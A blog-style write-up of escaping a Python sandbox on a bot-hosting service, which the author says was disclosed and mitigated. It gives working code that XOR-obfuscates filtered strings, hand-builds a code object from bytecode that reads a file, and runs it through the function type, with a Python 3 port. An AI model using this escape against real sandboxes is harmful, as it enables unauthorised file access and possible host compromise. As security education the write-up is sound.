A while ago, I stumbled upon a service that let you write Python bots to interact with a number of external services. The basic idea was that you only had to worry about your logic, and they would provide a wrapper around the APIs and take care of hosting the bot for a monthly fee.
Python "jail" or sandbox escapes are fairly common in CTFs, and I knew that there are all sorts of "magical" ways of doing things in Python, so I decided to poke around a bit. Sure enough, I found a way of circumventing the sandbox and getting (kind of) arbitrary Python to run. I've since talked to the founder about this, and they've taken steps to mitigate the damage one could do (specifically, virtualization is used to protect the host system), so I thought I'd talk about some real-world Python chaos :). With the level of access I had, I'm fairly sure it was possible to get a shell, and from there, who knows...
The remainder of this post will describe the process of breaking out of the sandbox they set up. Everything was written/tested on python 2.7.6.
At face value, the service was stripped of most dangerous components fairly well:
- "Fun" modules could not be imported (sys, os, etc)
- "Fun" keywords/functions got your script thrown out (exec, open(), read(), compile(), etc)
- "Fun" attributes, nope! (myfunc.func_code)
- Fun stuff couldn't even be in static strings! (Annoying, but not really that important).
    # XOR each value with 0x41; the result is the string "__builtins__"
    str1 = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30]
    for i in range(0, len(str1)):
        str1[i] = chr(str1[i] ^ 0x41)
    str1 = ''.join(str1)

That gets us around most of the basic string-matching, but it still doesn't let us do anything interesting. The rest of the exploit relies on code objects. If you're not familiar with them, this is a great overview.
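A quick aside on the XOR trick above: the list of numbers has to come from somewhere. Here's a minimal sketch of a helper pair that produces and reverses such a list. The names xor_encode and xor_decode are mine, not part of the original script, and the key 0x41 is simply the one used in the snippet.

```python
KEY = 0x41  # same XOR key as the snippet in the post


def xor_encode(text, key=KEY):
    """Turn a string into a list of XOR-masked integers."""
    return [ord(ch) ^ key for ch in text]


def xor_decode(values, key=KEY):
    """Reverse xor_encode: rebuild the string from masked integers."""
    return ''.join(chr(v ^ key) for v in values)


# The list from the post, decoded back into the string it hides.
encoded = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30]
decoded = xor_decode(encoded)
print(decoded)
```

Since XOR is its own inverse, the same key works in both directions, so you can generate the masked list offline and only ship the decoding loop.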
So, normally, Python allows you to access all the guts of functions. A function is basically a wrapper for a code-object, and (as the name implies) you can access and modify these objects as you like. The Python interpreter acts as a sort of VM, fetching and executing bytecode found inside code-objects. Python bytecode is assembly-ish. You can take a look here if you want to play around.
At first, it's tempting to just try directly modifying a dummy function's bytecode. However, that requires accessing the "func_code" member, which is explicitly blocked. Additionally, just modifying bytecode wouldn't be enough. Fortunately, it /was/ possible to get access to a code-object through the "__code__" attribute, which was not filtered.
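To make the function/code-object relationship a bit more concrete, here's a small sketch. The functions add_one and double are made-up examples, not anything from the service. It shows that the behaviour of a function lives in its code object: swap the code object and the function does something else, even though its name stays the same.

```python
import types


def add_one(x):
    return x + 1


def double(x):
    return x * 2


# Every function carries a code object in its __code__ attribute.
code_obj = add_one.__code__
is_code = isinstance(code_obj, types.CodeType)

before = add_one(10)

# Replace the code object; the function object itself is untouched.
add_one.__code__ = double.__code__
after = add_one(10)

print(is_code, before, after, add_one.__name__)
```

This only works here because both functions take the same arguments and neither uses closures; mismatched code objects are rejected or misbehave.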
cdbj = type(myfunc.__code__)
Now that we have the code type, we can use it to build a code object of our own, fill it in, and slide it into an empty function. The question at this point is: what do we fill it in with?

    >>> dir(f.__code__)
    ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__',
     '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__',
     '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__',
     '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount',
     'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno',
     'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names',
     'co_nlocals', 'co_stacksize', 'co_varnames']
So, that looks a bit intimidating, but really, we're only interested in a few of these. Specifically, I used:
- co_code: string of raw compiled bytecode
- co_consts: tuple of constants used in the bytecode
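- co_names: tuple of names referenced by the bytecode (globals and attributes, such as open and read); local variable names live in co_varnames instead
I had an info-leak that gave me the path of an interesting file, so I wanted my bytecode to basically do: open(<filename>).read().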
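If you want to see these three fields on a real function, here's a small sketch. It assumes Python 3 (where co_code is a bytes object rather than a str), and read_file is just a stand-in for the function we're trying to imitate. The exact contents of co_consts and the length of co_code vary between interpreter versions, so don't expect them to match the 2.7 values in this post.

```python
def read_file():
    return open("./poc.py", "r").read()


code_obj = read_file.__code__

# Collect the fields discussed above, plus co_varnames for contrast.
fields = {
    "co_names": code_obj.co_names,        # globals/attributes the bytecode looks up
    "co_consts": code_obj.co_consts,      # literal constants used by the bytecode
    "co_varnames": code_obj.co_varnames,  # local variable names (none here)
    "co_code_length": len(code_obj.co_code),
}

for key in sorted(fields):
    print(key, "=", fields[key])
```

Note how open and read show up in co_names while co_varnames is empty: the function has no locals at all.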
You can inspect bytecode in a user-friendly-ish way by using the dis module. This makes it easier to understand the fields we'll be filling in.
    import dis

    def read():
        return open("./poc.py", 'r').read()

    dis.dis(read.__code__)

    # Output:
     28           0 LOAD_GLOBAL              0 (open)
                  3 LOAD_CONST               1 ('./poc.py')
                  6 LOAD_CONST               2 ('r')
                  9 CALL_FUNCTION            2
                 12 LOAD_ATTR                1 (read)
                 15 CALL_FUNCTION            0
                 18 RETURN_VALUE

Now, to actually access the bytecode that results in this:

    bytecode = read.__code__.co_code
    print bytecode.encode('hex')
    >>> 7400006401006402008302006a010083000053

This gives us all the necessary pieces to create our code object. We can slide in our values like this:
    code = type(myfunc.__code__)  # Get the code type
    bytecode = "7400006401006402008302006a010083000053".decode('hex')  # Get our bytecode
    filename = "./poc.py"  # Set our filename
    consts = (None, filename, 'r')  # Set up our constants
    names = ('open', 'read')  # Set up our names

    # Slide our values into the code object.
    # Python 2.7 argument order: argcount, nlocals, stacksize, flags,
    # codestring, constants, names, varnames, filename, name,
    # firstlineno, lnotab, freevars, cellvars
    codeobj = code(0, 0, 3, 64, bytecode, consts, names, (),
                   'noname', '<module>', 1, '', (), ())

Great! Now we've created a code object with our desired functionality, without using anything that would trigger alerts. The only thing left to do is to find a way to execute it! Thankfully, functions in Python are quite malleable. You can read about all their attributes here.
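Before moving on, if you want to convince yourself that the hex string really is the open(...).read() sequence from the disassembly, you can decode it by hand. In Python 2.7, every opcode numbered 90 or above is followed by a two-byte little-endian argument, and the rest stand alone. The sketch below hard-codes only the five opcodes this payload uses; decode_py27 and OPNAMES are names I made up for illustration, and it runs on Python 3 so you don't need a 2.7 interpreter around.

```python
import binascii

HAVE_ARGUMENT = 90  # Python 2.7: opcodes >= 90 carry a 2-byte argument

# Only the opcodes that appear in this payload (Python 2.7 numbering).
OPNAMES = {
    83: "RETURN_VALUE",
    100: "LOAD_CONST",
    106: "LOAD_ATTR",
    116: "LOAD_GLOBAL",
    131: "CALL_FUNCTION",
}


def decode_py27(raw):
    """Decode Python 2.7 bytecode into (offset, opname, argument) tuples."""
    raw = bytearray(raw)
    decoded = []
    offset = 0
    while offset < len(raw):
        opcode = raw[offset]
        name = OPNAMES.get(opcode, "UNKNOWN_%d" % opcode)
        if opcode >= HAVE_ARGUMENT:
            # Argument is stored little-endian in the next two bytes.
            arg = raw[offset + 1] | (raw[offset + 2] << 8)
            decoded.append((offset, name, arg))
            offset += 3
        else:
            decoded.append((offset, name, None))
            offset += 1
    return decoded


raw = binascii.unhexlify("7400006401006402008302006a010083000053")
decoded_ops = decode_py27(raw)
for offset, name, arg in decoded_ops:
    print(offset, name, "" if arg is None else arg)
```

The arguments are indexes into the tuples we filled in: LOAD_GLOBAL 0 is names[0], LOAD_CONST 1 and 2 are consts[1] and consts[2], and LOAD_ATTR 1 is names[1].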
First, we start off with an empty, "dummy" function, and grab its type, "function", which we can then call to build new function objects.

    def f(): pass
    function = type(f)

Turns out there's one more major thing we need to do before we can slide in our code object. Python functions have a __globals__ attribute. This is described in the Python documentation as:
    "A reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined."

Since the only things our function uses are the open() built-in and the read() method of the file object it returns, we can create this dictionary easily enough.
    import __builtin__
    mydict = {}
    mydict["__builtins__"] = __builtin__

At this point, the only thing left to do is put all the pieces together. Using the "function" variable we created before:
return function(codeobj, mydict, None, None, None)
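If you'd like to try the same idea on a current interpreter, here's a rough Python 3 sketch. It is not the original exploit: raw bytecode is specific to each interpreter version, so instead of hard-coding a hex string it borrows the bytecode from a template function and only swaps the filename constant (using code.replace, which needs Python 3.8 or later). The names template, build_reader and the "PLACEHOLDER" string are my own inventions, and the temp file just stands in for the "interesting file".

```python
import builtins
import os
import tempfile


def template():
    # "PLACEHOLDER" is swapped for the real path in build_reader().
    return open("PLACEHOLDER", "r").read()


def build_reader(path):
    """Build a fresh function that reads `path`, from a patched code object."""
    function_type = type(template)  # the "function" type, no imports needed
    old_code = template.__code__

    # Copy the constants, replacing only the placeholder filename.
    new_consts = tuple(
        path if const == "PLACEHOLDER" else const
        for const in old_code.co_consts
    )
    new_code = old_code.replace(co_consts=new_consts)

    # Minimal globals: just enough for the open() lookup to succeed.
    namespace = {"__builtins__": builtins}
    return function_type(new_code, namespace, None, None, None)


# Demo: write a throwaway file, then read it through the rebuilt function.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
    handle.write("secret contents\n")
    demo_path = handle.name

reader = build_reader(demo_path)
result = reader()
os.remove(demo_path)
print(repr(result))
```

The final call has the same shape as the one in the post: a code object, a globals dictionary containing only the builtins, and None for the name, defaults and closure.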
So, in conclusion, we've created a code object and devised a way of executing it. Obviously, it is possible to block a few more keywords and stop this attack from being possible, but it highlights the difficulty of getting this sort of thing right.
For some ideas of taking this to the next level, take a look at this CTF writeup that discusses using a read/write primitive to obtain shell-level remote code execution on the host system. Certainly something to keep in mind.
Actually getting this to execute on similar production environments will probably require a bit more obfuscation/creativity. However, I've put together an example script that ties together all the steps explained here into a simple package that you should be able to execute and play with locally. Enjoy! :)